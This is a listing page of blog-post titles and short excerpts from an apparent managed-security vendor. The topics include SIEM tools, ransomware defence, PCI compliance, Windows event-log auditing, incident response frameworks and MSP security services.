8 Open Source SIEM Tools You Should Know

Security Information and Event Management (SIEM) platforms are no longer limited to large enterprises. While proprietary platforms have much to offer small and mid-sized organizations, many security leaders are attracted to the lower licensing costs offered by open source SIEMs.  These options don't always share the same features as proprietary alternatives, but they can present […]

How to Recover From a Ransomware Attack

Ransomware is projected to cost victims $265 billion by 2031 — more than ten times the damages reported in 2021. However, average ransom amounts are growing at a much slower pace.  That can only mean that the frequency of successful ransomware attacks is growing. Cybercriminals are improving their techniques and targeting organizations more carefully than […]

6 Factors Driving the Cloud Repatriation Trend in 2024

Find out why business leaders are moving IT infrastructure back into on-premises solutions.  Cloud repatriation — also known as reverse cloud migration — is becoming more common as organizations face obstacles in their cloud infrastructure strategy. Organizations are increasingly moving data, applications, and workloads from public cloud environments back to on-premises or local private cloud […]

What is Proofpoint and How Does it Work?

Proofpoint is a cybersecurity platform that protects workers and data from cybercriminals that target email, social media, and mobile devices. It provides enterprise-level cloud-based solutions against phishing, social engineering, and Business Email Compromise (BEC) attacks.   Proofpoint Email Protection is the flagship product, protecting user inboxes from phishing scams, imposter emails, and advanced cybersecurity threats by […]

Deliver Best-Fit Cybersecurity for Every Client

In theory, cybersecurity is simple. Most managed cybersecurity service providers would agree they know what best practices should be implemented, and they know what technologies, skillsets and processes are required to achieve them. We all have a favorite cybersecurity framework to help compartmentalize and systematize a robust and comprehensive cybersecurity operation too. But here’s the […]

5 Pitfalls in Cloud Cybersecurity Shared Responsibility Model 

Cloud computing offers many advantages for modern businesses, such as flexibility, scalability, efficiency, and innovation. But it also poses its own challenges and security risks. How can you secure your data and assets in the cloud? Who is in charge of what in the cloud environment?  The shared responsibility model helps address these questions and […]

8 Essential Skills for Modern Cybersecurity Professionals

Cybersecurity is one of the most in-demand and rewarding fields in the IT industry. As cyberthreats continue to evolve and pose challenges to individuals and businesses, cybersecurity professionals need to have a diverse set of skills to protect data, networks, and systems.   We understand that each organization and security operations team will vary somewhat, and […]

Netsurion Named a Top MSSP for 5th Year in a Row

The news is out and we’re proud to say Netsurion has been named, for a fifth year in a row, a top Managed Security Service Provider on MSSP Alert’s 2023 Top 250 MSSP list – carefully curated by the leader in global MSSP research. The MSSP Alert Top 250 list honors the top MSSPs, Managed […]

This Common Strategy is Killing Your Cybersecurity Revenue

For many of you reading this, it’s Q4 and you might be looking at your YTD sales and scratching your head about the low customer adoption of your cybersecurity services. Cybersecurity is a hot commodity, right? Every business needs it, right? So why aren’t your sales numbers rocketing right off your spreadsheet? In talking to […]

Scary Cyber Threats of 2023 and How to Vanquish Them

In terms of new critical vulnerabilities released, each year seems to be worse than the last. Unfortunately, it’s a trend that security analysts are unlikely to see decrease anytime soon. As businesses integrate new technology into their tech stack, they also introduce new avenues of attack. And these attackers are relentless. Malicious actors are able […]

Which security functions outsource poorly and which outsource well

The IT security industry’s skill shortage is a well-worn topic. Survey after survey indicates that a lack of skilled personnel is a critical factor in weak security posture. If the skills are not available in your organization then you could: a) ignore the problem and hope for the best, or b) get help from the outside.

Who suffers more - cybercrime victims or cybersecurity professionals?

So you got hit by a data breach, an all too common occurrence in today’s security environment. Who gets hit? Odds are you will say the customer. After all, it’s their Personally Identifiable Information (PII) that was lost.

Why a Co-Managed SIEM?

In simpler times, security technology approaches were clearly defined and primarily based on prevention with things like firewalls, anti-virus, web, and email gateways. There were relatively few available technology segments and a relatively clear distinction between security technology purchases and outsourcing engagements.

Why Comply with PCI Security Standards

Why should you, as a merchant, comply with the PCI Security Standards? At first glance, especially if you are a smaller organization, it may seem like a lot of effort, and confusing to boot. But not only is compliance becoming increasingly important, it may not be the headache you expected.

Why is patching important to the security of your business?

If you are not keeping up with regular patching of your computer and the programs that run on it, then you are simply asking for trouble. Many of the breaches that make the news are caused by holes in software for which the vendor had already released a patch.

Why Managed Endpoint Security Eliminates Cybersecurity Blind Spots

Incomplete cybersecurity information visibility comes at a cost. Without real-time comprehensive visibility, organizations experience blind spots that handcuff your cybersecurity protection and increase risk. IT environments are increasingly complex as they span on-premises, cloud, endpoint, and hybrid approaches.

Why Naming Conventions are Important to Log Monitoring

Log monitoring is difficult for many reasons. For one thing, there are not many events that unquestionably indicate an intrusion or malicious activity. If it were that easy, the system would just prevent the attack in the first place.

Will CIOs Be the Final Victim After a Breach

In the wake of their breach, Target announced on March 5, 2014 that their CIO, Beth Jacob, was resigning. This begs the question: will CIOs be the final victim after a breach?

Wireless Security for Business

In today’s business world, a major draw for many customers is the ability to stay connected while outside the office. Providing this connectivity typically means having a wireless network set up for your customers. However, it also means placing your business at a potential risk.

Your Best Defense Against Ransomware Might Be Your Employees

While your business’ data security program should consist of many components, perhaps the most effective defense to ransomware is building a culture of data security amongst your employees.

Your Voice for SMB Compliance Pains

We believe that every business should have the means to protect themselves and their customers from cyberattacks, and the PCI Security Standards Council (PCI SSC) shares this belief. We’re working together to make compliance management more efficient, and therefore strengthen the security of all merchants.

Navigating Your Managed Cybersecurity Options

If you’re aiming to improve your organization’s threat detection and incident response (TDIR) capabilities, I’m willing to bet you’re annoyed and frustrated by trying to navigate the managed cybersecurity market that’s rife with imprecise terminology and vendors willing to bend definitions to fit their solutions. As a result, you have an extremely difficult job in trying to find the right solutions, let alone pick the best one.

Align Your Cybersecurity Posture to Your Cyber-Risk Tolerance

Your business’s IT network is constantly connected to the Internet, includes countless SaaS applications and API connections, and is accessed by employees and vendors located anywhere in the world. As a result, your business is always exposed to cyber-risk, some of which is avoidable, but also some of which is unavoidable. Your cyber-risk tolerance, the […]

Malware’s Crazy Names: Where Do They Come From? 

Do you ever wonder where malware names come from? What's in a name, after all? There’s Heartbleed, Melissa, and GooLoad. There’s even ILOVEYOU. All these names appear to have come from nowhere, just like the malware they’re attached to.   There is no universally adopted standard for naming malware, although you’d think there would be (more […]

Three myths surrounding cybersecurity

A common dysfunction in many companies is the disconnect between the CISO, who views cybersecurity as an everyday priority, versus top management who may see it as a priority only when an intrusion is detected. Does your organization suffer from any of these?

SIEM and Return on Security Investment (RoSI)

The traditional method for calculating standard Return on Investment (RoI) is that it equals the gain minus the cost, divided by the cost. The higher the resulting value, the greater the RoI. The difficulty in calculating a return on security investment (RoSI), however, is that security tends not to increase profits (gain), but to decrease loss – meaning that the amount of loss avoided rather than the amount of gain achieved is the important element.

Believe it or not, compliance saves you money

We all hear it over and over again: complying with data protection requirements is expensive. But did you know that the financial consequences of non-compliance can be far more expensive?

10 Free and Open Source Cybersecurity Tools to Know

Open source software is an attractive option for many IT leaders and teams, especially at small and mid-sized organizations. Instead of paying large licensing fees to an enterprise software vendor, your team can customize the source code of free open source platforms and security tools.  The overall market for open source software services was […]

Why Risk Classification is Important

Traditional threat models posit that it is necessary to protect against all attacks. While this may be true for a critical national defense network, it is unlikely to be true for the typical commercial enterprise. In fact, many technically possible attacks are economically infeasible and thus not attempted by typical attackers.

Current Malware Trends: 5 Most Common Types of Malware in 2024

Threat actors are converging on similar tactics across the board.  Cybercriminals are inventive and opportunistic, leveraging any advantage they can to gain access to sensitive data and assets.   However, they’re not as individualistic as often portrayed. Threat actors invest time and energy into maintaining relationships with other hackers, ransomware gangs, and criminal organizations. This can […]

What Does It Cost to Build a Security Operations Center (SOC)?

Your organization needs dedicated space and infrastructure for conducting security operations.   Introduction to Security Operations Centers (SOCs)  Your SOC is where most of your organization’s security processes take place. Those processes require specialized equipment and expertise. Consolidating that footprint into a single place makes economic sense and drives security performance.  That doesn’t mean every […]

The SANS Incident Response Framework

Incident response plans give security teams a standardized set of procedures for mitigating the risks associated with security incidents. They make cyberattacks less disruptive, reduce operational downtime, and contain data breaches. Since every organization is unique, it needs to create a set of incident response playbooks designed to fit its security risk profile. It also […]

5 Most Overlooked Elements of Incident Response Plans

Learn how to establish robust, standardized security controls for handling any kind of incident. Data breaches and security incidents are tense, high-pressure situations where every second counts. In that scenario, having a clear and detailed incident response plan ready can mean the difference between success and failure. In an environment where one hour of downtime […]

The NIST Cybersecurity Framework (CSF)

Every organization wants to improve its information security capabilities. Part of a security leader’s job is identifying the best way to do that. However, no two organizations are exactly alike. Various stakeholders may have different ideas about what high-impact security excellence looks like in practice. Achieving meaningful security goals means getting everyone on the same […]

The Future of AI in Cybersecurity: How to Plan Ahead for AI Disruption

Find out how AI is likely to impact the cybersecurity industry in the next decade.  Artificial intelligence has been an integral part of the cybersecurity industry for several years now. However, the widespread public adoption of Large Language Models (LLMs) that took place in 2023 has brought new and unexpected changes to the security landscape.  […]

Introduction to Incident Response Frameworks

Efficient incident response processes lead to reduced downtime, lower security operations costs, and higher ROI on security spend. Cybersecurity is all about being prepared. Thorough incident response processes are crucial to your organization’s ability to successfully overcome a security breach. Prevention is important, though it can only take your organization so far. There is always […]

Incident Response Frameworks Explained

The incident response process is necessarily a reactive one. You can only respond to an incident once it has been detected.   This makes it difficult to predict or optimize incident response outcomes. If an organization has never experienced a ransomware attack, how will it know when it’s ready to face one?  Incident response frameworks enable […]

Understanding MDR, EDR, EPP, and XDR

The cybersecurity industry is notorious for coining terms and acronyms that rise and fall out of favor before they even have a chance to be fully understood. We get it – rapid innovation can be messy and lead to confusion and clutter. While it’s exciting and encouraging to see so many solution providers invent new solutions and improve upon others, resulting in new concepts, sometimes all of this terminology is honestly just an effort to stand out from the crowd.

Is your business at risk of a data breach?

2016 Verizon Breach Investigations Report (Part 1 of 3)
The 80-page report is packed with valuable data breach insights. We know time is valuable, so we decided to save you some by sharing the 3 main topics you should understand from this report.

Welcome to the New Security World of SMB Partners

Yet another recent report confirms the obvious, that SMBs in general do not take security seriously enough. The truth is a bit more nuanced than that, of course—SMB execs generally take security very seriously, but they don’t have the dollars to do enough about it—although it amounts to the same thing.

Five Steps to Protect Retailers from Credit Card Theft

The Georgia-based fast food company, Chick-fil-A, has confirmed that it is investigating a potential credit card breach. The investigation is focused on the company’s point-of-sale (POS) network at some of its restaurants, and the breach is thought to have occurred between December of 2013 and September of 2014.

Three paradoxes disrupting IT Security

2017 has been a banner year for IT Security. The massive publicity of attacks like WannaCry have focused public attention like never before on a hitherto obscure field. Non-technical people, including board members, nod gravely when listening as the CISO.

Monitoring File Permission Changes with the Windows Security Log

Unstructured data access governance is a big compliance concern.  Unstructured data is difficult to secure because there’s so much of it, it’s growing so fast, and it is user-created, so it doesn’t automatically get categorized and controlled like structured data in databases.

Experimenting with Windows Security: Controls for Enforcing Policies

Interest continues to build around pass-the-hash and related credential artifact attacks, like those made easy by Mimikatz. The main focus surrounding this subject has been hardening Windows against credential attacks, cleaning up artifacts left behind, or at least detecting PtH and related attacks when they occur.

Going Mining for Bitcoin

While you’ve been busy defending against ransomware, the bad guys have been scheming about new ways to steal from you. Let’s review a tactic seen in the news called bitcoin mining.

Catching Hackers Living off the Land Requires More than Just Logs

If attackers can deploy a remote administration tool (RAT) on your network, it makes it so much easier for them. RATs make it luxurious for bad guys; it’s like being right there on your network. RATs can log keystrokes, capture screens, provide RDP-like remote control, steal password hashes, scan networks, scan for files and upload them back to home. So if you can deny attackers the use of RATs, you’ve just made life a lot harder for them.

Foster a Healthy Security Posture

Securing medical records is a complex undertaking. Healthcare organizations need an array of security technologies that can be used to prevent malicious attacks and keep personal healthcare information safe, while retaining the day-to-day ease-of-use.

Detecting Ransomware: The Same as Detecting Any Kind of Malware?

Ransomware burst onto the scene with high profile attacks against hospitals, law firms and other organizations.  What is it and how can you detect it? 

Balancing Privacy and Security

In the wake of the most recent terrorist bombing in Boston, it is easy to understand why some people would be willing to sacrifice a few liberties to the government in favor of more security. A common train of thought is that an honest person does not have anything to hide, so the intrusion into our private lives is really a minor thing. In a Utopian society, I would tend to agree with that sentiment, but we live somewhere else.

Top 6 uses for SIEM

Security Information and Event Management (SIEM) is a term coined by Gartner in 2005 to describe technology used to monitor and help manage user and service privileges, directory services, and other system configuration changes, as well as to provide log auditing and review and incident response.

Is the IT Organizational Matrix an IT Security Problem?

Is the IT Organizational Matrix an IT Security Problem?

Do you embrace the matrix? The fact is, once networks get to a certain size, IT organizations begin to specialize and small kingdoms emerge.

Prevention is Key in Cybersecurity

A lot of data, an overwhelming amount actually, is available from hundreds of sources, but rarely is it observed. Having something and getting value from it are entirely different.

Every Merchant Needs Electronic Data Protection

How many days go by between news stories involving computer breaches? The truth of the matter is that as long as sensitive data is gathered by merchants, thieves will attempt to steal it.

Mitigate Software Supply Chain Attacks with SIEM and EDR

At Black Hat 2019, Eric Doerr, GM of the Microsoft Security Response Center, reminded attendees of the interconnectedness of enterprise software supply chains and of their vulnerability to attack. Eric highlighted how supply chain compromises come in many guises.

MDR is a Critical Capability for MSSPs: Keys to Making the Right Choice

MSSPs need airtight threat detection and rapid, reliable remediation. The optimal way to do this is to ensure you have top-notch MDR capabilities 24/7/365. Many MSSPs partner with an MDR provider to achieve this.

Do Hackers Fear U.S. Jails?

In what should only be considered a victory for the U.S. DOJ, 2 of the 4 alleged Subway hackers responsible for potentially $10 million in computer fraud have been sentenced, and the trial of 1 of the remaining criminals is set to begin shortly.

Just how dangerous is ransomware?

Ransomware is a business’ worst nightmare. This malware infects computers and prevents users from accessing any of their data until they pay the ransom. What would you do to get that data back?

Find Out Who Is Affected By A Data Breach?

The number of data breaches continues to increase. Cybercrime affects your brand, your customers and your employees in ways that are unrecoverable at times. Don't let your business be affected next.

Five Fallacies That Are Holding Back Adoption of Threat Hunting

Organizations can no longer afford to be just reactive, relying solely on detection and response when it comes to cybersecurity. Threat hunting is the next step. It is a proactive approach to uncovering threats that otherwise go undetected, like multi-stage ransomware attacks and malware that lies dormant in your network until activated to exfiltrate data.

Case of the Disappearing Objects: How to Audit Who Deleted What in Active Directory

I often get asked how to audit the deletion of objects in Active Directory. It’s pretty easy to do this with the Windows Security Log – especially for tracking deletion of users and groups which I’ll show you first. All you have to do is enable “Audit user accounts” and “Audit security group management” in the Default Domain Controllers Policy GPO.

Can general purpose tools work for IT security?

This post got me thinking about a recent conversation I had with the CISO of a financial company. He commented on how quickly his team was able to instantiate a big data project with open source tools.

Three key advantages for SIEM-As-A-Service

Security Information and Event Management (SIEM) technology is an essential component in a modern defense-in-depth strategy for IT Security. SIEM is described as such in every best practice recommendation from industry groups and security pundits. The absence of SIEM is repeatedly noted in the Verizon Enterprise Data Breach Investigations Report as a factor in the late discovery of breaches.

Top three high risk behaviors that compromise IT Security

The insider threat is typically much more infrequent than external attacks, but it usually poses a much higher severity of risk for organizations when it does happen. While it can be perpetrated by malicious actors, it is more commonly the result of negligence.

Ten Steps to Defend Your Microsoft Exchange Servers from ProxyLogon Exploit

Microsoft has detected multiple zero-day exploits being used to attack on-premises versions of Microsoft Exchange Server. According to reports, observations of attacks leveraging the critical vulnerabilities are increasing very rapidly. In the span of a few days, over 30,000 organizations – small businesses and municipalities included – across the U.S. have been hacked.

IT Service Providers: Mind the Security Gap

Persistent threats affecting businesses of all sizes and in all verticals are becoming more consistent and hitting more frequently. The 2016 Verizon Data Breach report analyzed 100,000 incidents, of which 3,141 were confirmed data breaches.

No Business is Too Small for Hackers!

It's National Small Business Week! Let's celebrate the hard work you do and make sure your business continues to grow. Have you ever thought about what would happen if your business is affected by a data breach? 

IT Community Shaken By Shellshock Vulnerabilities

In the wake of Heartbleed comes a new form of exposure that could potentially do much more damage than any other vulnerability of its kind. It is known as Shellshock. Shellshock affects Linux and UNIX implementations that use the BASH command interpreter.

Key Takeaways from MITRE ATT&CKcon 3.0 for Defenders

MITRE ATT&CKcon 3.0, the conference dedicated to the ATT&CK community, returned to MITRE headquarters in Virginia last month. As a refresher, MITRE ATT&CK® is a knowledge base of adversary tactics and techniques based on real-world observations.

Top 3 Microsoft 365 Security Concerns and What to do About Them

Microsoft 365 is immensely popular across all industry verticals in the small-to-medium-sized business (SMB) space. It is often the killer app for a business and contains valuable, critical information about the business. Accordingly, Microsoft 365 resiliency and defense are top concerns on IT leaders’ minds.

Demystifying PCI Compliance

PCI compliance: that daunting phrase you always hear in the world of payments…but never truly understand. Well we’re here to sum it up for you—what it is, why it’s important and what you need to meet this standard.

EventTracker Enterprise and the Cyber Kill Chain

Defense strategies that focus exclusively on the perimeter and on prevention do not take into account the kill chain life cycle approach; this is a reason why attackers are continuing to be so successful.

Security Logging as a Detective and Deterrent Control Against Rogue Admins

Intrusion detection and compliance are the focus of log management, SIEM and security logging.  But security logs, when managed correctly, are also the only control over rogue admins.  Once root or admin authority has been given to, or acquired by, a user, there is little they cannot do.

Criminal Gang NOBELIUM Ramps Up Attacks

Threat researchers detected threat group NOBELIUM conducting several waves of malicious spear phishing email campaigns. Each wave used different technical lures and social engineering to fine-tune which threat performed best against targeted government agencies, consultants, and non-profits in over 20 countries.

The Perimeter is Dead: Long-live the Perimeter

In 2005, the Department of Homeland Security commissioned Livermore National Labs to produce a kind of pre-emptive post-mortem report.

Ransomware is only getting started

Ransomware is about denying you access to your data via encryption. But that denial has to be of a great enough magnitude to create sufficient motivation for the victim to pay.

Are you guilty of any of these PCI myths?

We have gathered what have been common comments that we hear from business owners. And today, we would like to bust these myths!

Tips for Protecting Information While on the Go: What Summer Travelers Need to Know About Security

As the summer travel season quickly approaches, most people envision exchanging work clothes and school books for shorts, flip flops, and beach umbrellas as they look forward to that well-deserved vacation. Unfortunately, hackers have their own plans this summer...

May Your Holidays be Merry, Bright, and Hack Free: Security Tips for the Biggest Shopping Season

Though there are many companies out there responsible for securing merchant locations from the risks of data breaches, people’s own risky behavior often leads to their ID theft problems, no matter how well merchants protect them. And with more and more merchants accepting chip cards this year, hackers are likely to go back to tried and true methods for preying on individual cardholders.

How to Use Process Tracking Events in the Windows Security Log

I think one of the most underutilized features of Windows Auditing and the Security Log is Process Tracking events. In Windows 2003/XP you get these events by simply enabling the Process Tracking audit policy.

How to Protect Healthcare Data: 5 Cybersecurity Tips for MSPs

For MSPs serving clients in the healthcare industry, protecting data can be complex. With compliance enforcement like HIPAA, for instance, distinguishing the owner of your clients’ data is critical, especially given the lack of security awareness training among healthcare end users. Here are the five key data security tips to better protect SMB clients in healthcare.
What good is Threat Intelligence integration in a SIEM?

Bad actors/actions are more and more prevalent on the Internet. Who are they? What are they up to? Are they prowling in your network? The first two questions are answered by Threat Intelligence (TI), the last one can be provided by a SIEM that integrates TI into its functionality.
Netsurion Defense Against Backoff

In the wake of BackOff, and numerous other data breaches, consumers are demanding answers into the how and why surrounding companies who have inadvertently allowed data to be compromised given security measures accessible today.
SIEM, UEBA, SOAR and Your Cybersecurity Arsenal

The evolution of Security Information and Event Management (SIEM) solutions has made a few key shifts over time. It started as simply collecting and storing logs, then morphed into correlating information with rules and alerting a team when something suspicious was happening.
When is an alert not an alert?

Users of the EventTracker platform know that one of its primary functions is to apply built-in knowledge to reduce the flood of all security/log data to a much smaller stream of prioritized alerts.
SIEM and Return on Investment: Four Pillars for Success

Return on investment (ROI) - it is the Achilles heel of IT management. Nobody minds spending money to avoid costs, prevent disasters, and ultimately yield more than the initial investment outlay. But is the investment justified?
Protecting Legal Data: 3 Ways MSPs Can Enhance Cybersecurity

The legal world is centered on offering clients protection—and in the current technology environment, that extends to cybersecurity. With the proper security procedures, policies, training, and IT security in law firms, advanced cybersecurity is yet another way that lawyers can protect their clients today.
MSPs Need Both Cybersecurity Automation and Human Expertise

The rising level of security threats and public incidents demands new approaches to people, processes, and technology that optimize manual processes and harness the benefits of automation. Automation and machine learning (ML) remove inefficiencies and the potential for error or security gaps. While programmatic threat detection and incident response minimize false positives along with staff and skill shortages, it is not a panacea or quick fix. Human analysts are still the most vital link in cybersecurity defense that differentiates you in the marketplace.
How Strong Are Your Passwords? Tips To Keep You Protected

Passwords keep your accounts and network safe but may also be a gateway for hackers. Here are some quick tips we recommend when creating your passwords.
Demystifying MDR: Five Myths for MSSPs

Small-to-medium-sized businesses (SMBs) are continuously seeking ways to safeguard their data and resiliency against persistent criminals through increased cyber defenses. But their security service providers often find that they are ill equipped to address advanced threats, let alone know where to begin. Managed Detection and Response (MDR) solutions are gaining traction with resource-constrained organizations looking for 24/7 proactive protection. The threat landscape and MDR marketplace is evolving, creating confusion for Managed Security Service Providers (MSSPs) and customers alike.
Auditing File Shares with the Windows Security Log

Over the years, security admins have repeatedly asked me how to audit file shares in Windows.  Until Windows Server 2008, there were no specific events for file shares.
How do you determine IT security risk?

How much security is enough? That’s a hard question to answer. You could spend $1 or $1M on security and still ask the same question. It’s a trick question; there is no correct answer.
How many people does it take to run a SIEM?

You must have heard light bulb jokes, for example: How many optimists does it take to screw in a light bulb? None, they’re convinced that the power will come back on soon.
Healthcare Practices are at Particularly High Risk of Data Breach

The CDC estimates that close to 80% of office-based physicians use some form of electronic medical records. This increase, coupled with recent breaches of patients’ PHI and PII, has highlighted the need for security of medical office networks.
Helping Enterprises of All Sizes Accelerate Their Security Journey

Change is the only constant in the IT security space. Here at Netsurion, we strive to empower organizations to take on ever-evolving cyber threats regardless of the size and scope of their business operations. With this core mission in mind, we are proud to introduce John Addeo as our new Chief Revenue Officer.
Black Hat Recap: Cybersecurity Insights That Enhance Security Operations

Black Hat 2019 was a learning experience and success for all. All of the hackers, presenters, vendors, and attendees have gone home, but what you learned in Vegas doesn’t have to stay in Vegas. Hopefully you are bringing new information and insights back to your daily operations. Here are some of Netsurion’s key takeaways from Black Hat 2019.
Tracking removable storage with the Windows Security Log

With data breaches and Snowden-like information grabs, I’m getting increased requests for how to track data moving to and from removable storage, such as flash drives. The good news is that the Windows Security Log does offer a way to audit removable storage access.
Use VPN Properly to Support Work-from-Home Employees

With most employees working from home amid COVID-19 (coronavirus) outbreak, VPN servers have now become paramount to a company's backbone, and their security and availability must be the focus going forward for IT teams. It is now more important than ever that companies and IT staff set up systems to capture metrics about the performance and availability of VPN services.
Thieves Tried to Steal Credit Cards from Nordstrom

The department store giant garnered unwanted attention earlier this month when they announced that a Florida store fell victim to a team of thieves who attached extremely small devices called key loggers in line with their keyboards where they plug into the registers.
Learn Why Data Privacy is Good for Your Business

Following many high-profile data breaches, consumers have elevated data privacy to front-page news and included it as criteria for brand selection and engagement. Consumers around the globe now realize that they aren’t always aware or informed about how their private information is used or shared. Fifty-four percent of consumers are more concerned with protecting their personal information than they were a year ago, according to a survey reported by Security Magazine.
Certificates and Digitally Signed Applications: A Double Edged Sword

Windows supports the digital signing of EXEs and other application files so that you can verify the provenance of software before it executes on your system. This is an important element in the defense against malware. When a software publisher like Adobe signs their application they use the private key associated with a certificate they’ve obtained from one of the major certification authorities like Verisign.
Avoid Three Common Active Directory Security Pitfalls

While the threats have changed over the past decade, the way systems and networks are managed have not. We continue with the same operations and support paradigm, despite the fact that internal systems are compromised regularly.
Buy, Rent, or Uber Your Security Operations Center

For cyber criminals, everyone’s a target. We must assume that, at some point, every organization’s IT infrastructure will be breached. That’s why we need to continuously monitor, investigate, and respond to cyber threats 24/365 if we are to avoid costly breaches.
Advanced HTTP Flood Attacks Are Becoming Commonplace: Make Sure Your Organization is Prepared

Cybercriminals are now leveraging attack vectors previously only available to well-funded nation-state actors. Security professionals know the dangers associated with distributed denial-of-service (DDoS) attacks. These attacks typically target the core data transmission protocols that form the foundation of every organization’s internet services.
Cloud Security Starts at Home

Cloud security is getting attention and that’s as it should be.  But before you get hung up on techie security details, like whether SAML is more secure than OpenID Connect and the like, it’s good to take a step back.  One of the tenets of information security is to follow the risk.
Top 3 traits of a successful Security Operations Center

Traditional areas of risk — financial risk, operational risk, geopolitical risk, risk of natural disasters — have been part of organizations’ risk management for a long time. Recently, information security has bubbled to the top, and now companies are starting to put weight behind IT security and Security Operations Centers (SOC).
Think you are too small to be hacked?

Why has ransomware exploded on to the scene in 2017? Because it works.
Time is money. Downtime is loss of money.

The technological revolution has introduced a plethora of advanced solutions to help identify and stop intrusions. There is no shortage of hype, innovation, and emerging trends in today's security markets. However, data leaks and breaches persist.
SIEM: Sprint or Marathon?

Winning a marathon requires dedication and preparation. Over long periods of time. A sprint requires intense energy but for a short period of time. While some tasks in IT Security are closer to a sprint (e.g., configuring a firewall), many, like deploying and using a Security Information and Event Management (SIEM) solution, are closer to a marathon.
Practical Ways to Implement Threat Hunting

If you think your organization is too small to be targeted by threat actors, think again. Over 60% of organizations have experienced an exploit or breach, so the stealthy and ever-evolving hacker may already be in your organization performing reconnaissance or awaiting strategic command and control (C&C) instructions.
MSPs: How to Add Security Services Fast and Affordably

You’ve seen it over and over again in the headlines – small subcontractors are often soft-target gateways for hacking large clients. Middle-tier businesses are very attractive and vulnerable targets for ransomware attacks. And, as recently seen in the news, Managed Service Providers (MSPs) attacked through trusted supply-chain software vendors can put their own clients at risk. These unfortunate facts have created a demand for IT service providers, including MSPs, to expand their cybersecurity offerings or at least explain their own security preparedness to customers.
Backoff Has Been Upgraded: Harder to Detect

So when you are a hacker and you write the most successful financial transaction hacking software in history, what do you do next? Well, if you are the makers of Backoff, you upgrade it.
MSPs Versus Ransomware in 2022: Where Multi-Layered Security Fits In

Skyrocketing ransomware threats and extortion demands show no sign of slowing down in 2022. Average ransomware demands surged by 518% in the first half of 2021 compared to 2020, while payments climbed by 82% in the same period, according to Infosecurity Magazine. Crippling ransomware attacks caused an average business downtime of six days with costs in the millions.
Four Key Steps to Rapid Incident Response

Is it possible to avoid security breaches? Judging from recent headlines, probably not. Victims range from startups like Kreditech, to major retailers like Target, to the US State Department and even the White House. Regardless of the security measures you have in place, it is prudent to assume you will suffer a breach at some point. Be sure to have a response plan in place — just in case.
MSSP Live 2022 Top MSP Cybersecurity Takeaway: Teamwork Makes the Dream Work

A common dedication to providing excellent client services, a driving need to enhance cybersecurity capabilities and an outstanding cyber monetization opportunity generated tremendous energy and focus among attendees at the recently concluded first annual MSSP Live event.

Pay Attention to System Security Access Events

There are five different ways you can log on in Windows called “logon types.” The Windows Security Log lists the logon type in event ID 4624 whenever you log on.
Perfect protection is not practical

With distressing regularity, new breaches continue to make headlines. The biggest companies, the largest institutions both private and government are affected. Every sector is in the news.
How to Detect Low Level Permission Changes in Active Directory

We hear a lot about tracking privileged access today because privileged users like Domain Admins can do a lot of damage. But more importantly, if their accounts are compromised the attacker gets full control of your environment. In line with this concern, many security standards and compliance documents recommend tracking changes to privileged groups like Administrators, Domain Admins and Enterprise Admins in Windows, and related groups and roles in other applications and platforms.
Vulnerability Management and Protection: Think Like a Hacker

Today’s modern attack surface encompasses the network, cloud, endpoints, mobile devices, and applications and is constantly under attack from well-armed cyber criminals. Vulnerability management offers strategic insight into vulnerable applications and devices from the viewpoint of a cyber criminal, that you can plug before attackers can exploit. Vulnerability management is for service providers as well as their end-customers.
Top 5 SIEM complaints

Here’s our list of the Top 5 SIEM complaints: 1) We bought a security information and event management (SIEM) system, but it’s too complicated and time-consuming, so we’re:
The 5 stages of SIEM Implementation

Are you familiar with the Kübler-Ross 5 Stages of Grief model? SIEM implementation (and indeed most enterprise software installations) bear a striking resemblance.
Cybersecurity Cyber Crime in 2023: What MSPs Need to Know

Managed service providers face a double-edged sword in the world of cyber security and cybercrime. In May 2022, a joint cybersecurity advisory from the UK, Australia, Canada, New Zealand and the US warned that MSPs are increasingly being targeted by cyber criminals. And cyber attacks on MSP customers, small- and medium-sized businesses (SMBs), will also continue to rise. It’s shaping up to be another year of increasingly sophisticated cyber incidents.
Cybersecurity is an Investment, Not a Cost Center

The cybersecurity threat landscape is in constant motion – ever evolving. According to Kaspersky Labs, 323,000 new malware strains are discovered daily! Clearly, this rate of increased risk to a company’s assets and business continuity warrants a smart investment in cybersecurity.
RetailNOW Recap 2016: Security Top of Mind for Attendees

The event, aimed at connecting the point-of-sale (POS) technology ecosystem, was extremely successful because it gave us the perfect platform to further connect with our existing partners—and to meet and interact with industry leaders.
How to Protect Your Network from Ransomware: Tips from the FBI

The FBI estimates that more than 4,000 ransomware attacks have occurred daily since the beginning of 2016. That’s a 300% increase from the previous year. This is due in part to the thriving sector of “ransomware-as-a-service.”
Report All the Binary Code Executing on Your Network with Sysmon Event IDs

Computers do what they are told, whether good or bad. One of the best ways to detect intrusions is to recognize when computers are following bad instructions – whether in binary form or in some higher level scripting language.
Logging for HIPAA Part 2; Secure auditing in Linux

HIPAA Logging HOWTO, Part 2. The Health Insurance Portability and Accountability Act of 1996 (HIPAA) outlines relevant security and privacy standards for health information – both electronic and physical. The main mission of the law is “to improve portability and continuity of health insurance coverage in the group and individual markets, to combat waste, fraud, and abuse in health insurance and health care delivery” (HIPAA Act of 1996 http://www.hhs.gov/ocr/privacy/). A recent enhancement to HIPAA is called the Health Information Technology for Economic and Clinical Health Act, or HITECH Act.
Maximize your SIEM ROI

Far too many SIEM implementations are considered to be catastrophes. Having implemented hundreds of such projects, here are the three parts of a SIEM implementation which if followed will in fact minimize the drama but maximize the ROI.
How the EventTracker/Netsurion merger will bring you more powerful cybersecurity solutions

We are delighted that EventTracker is now part of the Netsurion family. On October 13, 2016 we announced our merger with managed security services Netsurion. As part of the agreement, Netsurion’s majority shareholder, Providence Strategic Growth, the equity affiliate of Providence Equity Partners, made an investment in EventTracker to accelerate growth for our combined company.
Sustainable vs. Situational Values

I am often asked that if Log Management is so important to the modern IT department, then how come more than 80% of the market that “should” have adopted it has not done so?

Mobile Tech in Healthcare Can Put Your Practice at Risk

While you focus on providing the best health service for your patients, it is easy to underestimate the risks you may be exposing your practice to should you implement mobile technology without basic security measures.
Monitoring DNS Traffic for Security Threats

Cyber criminals are constantly developing increasingly sophisticated and dangerous malware programs. Statistics for the first quarter of 2016 compared to 2015 shows that malware attacks have quadrupled.
IT Security: How Much Should You Spend?

Just how much should you be spending on IT Security? It’s a vexing question to answer for many reasons as each situation has their unique circumstances and factors. But here are some insights garnered over the last decade in cybersecurity.
Malware, Ransomware, and the Next Big Threat

Imagine the lost revenue for a major retailer if they needed to shut down all of their stores for a few days, or even a few hours, especially over the busy holiday season. The impact would be devastating.
Detecting Zeus, Logging for incident response, and more

